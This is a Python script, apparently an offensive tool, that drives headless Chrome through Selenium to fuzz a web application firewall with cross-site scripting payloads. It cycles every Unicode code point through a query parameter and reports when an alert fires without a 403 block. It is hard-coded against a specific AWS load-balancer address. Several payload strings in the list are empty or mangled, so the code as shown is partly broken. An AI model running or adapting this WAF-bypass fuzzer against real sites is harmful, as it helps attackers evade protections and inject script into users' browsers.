from urllib.parse import unquote import selenium import time from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from urllib.parse import urlparse from urllib.parse import urlencode # WAFBypass class class WAFBypass(): code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}" def __init__(self, url) -> None: self.options = webdriver.ChromeOptions() self.options.add_argument('--no-sandbox') self.options.add_argument('--headless') self.driver = webdriver.Chrome(options=self.options) self.url = urlparse(url) if not self.check_connection(): raise Exception("Connection Error") self.driver.execute_cdp_cmd( "Page.addScriptToEvaluateOnNewDocument", {"source": self.code}) def check_connection(self): try: self.driver.get(self.url.geturl()) return True except: return False def wait_for_pageload(self): try: WebDriverWait(self.driver, 4).until( lambda driver: driver.execute_script("return document.readyState") == "complete") except TimeoutError: raise Exception("Page Load Error") def get_page_title(self): return self.driver.title @property def is_403(self): return self.driver.title == "403 Forbidden" @property def triggered_xss(self): return self.driver.execute_script("return window.alert_trigger") def navigate(self, url): self.driver.get(url) self.wait_for_pageload() bypass = False if self.is_403: bypass = False else: bypass = True bypass = bypass and self.triggered_xss return bypass def run_fuzz(self): payloads = [ "", "", "\u202e

", """<<\nscrip t="alert(0)""", ] try: for i in range(0, 0x10FFFF): for p in payloads: encoded = urlencode( {"param2": p.replace("{FUZZ}", chr(i))}) print("Trying payload: ", encoded, f"({hex(i)}/0xffff)") url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" bypassed = self.navigate(url) if bypassed: print("Bypassed with payload: ", encoded) break except KeyboardInterrupt: self.driver.close() exit(0) w = WAFBypass("http://aws-wafbypass-lb-311079289.eu-south-1.elb.amazonaws.com") w.run_fuzz()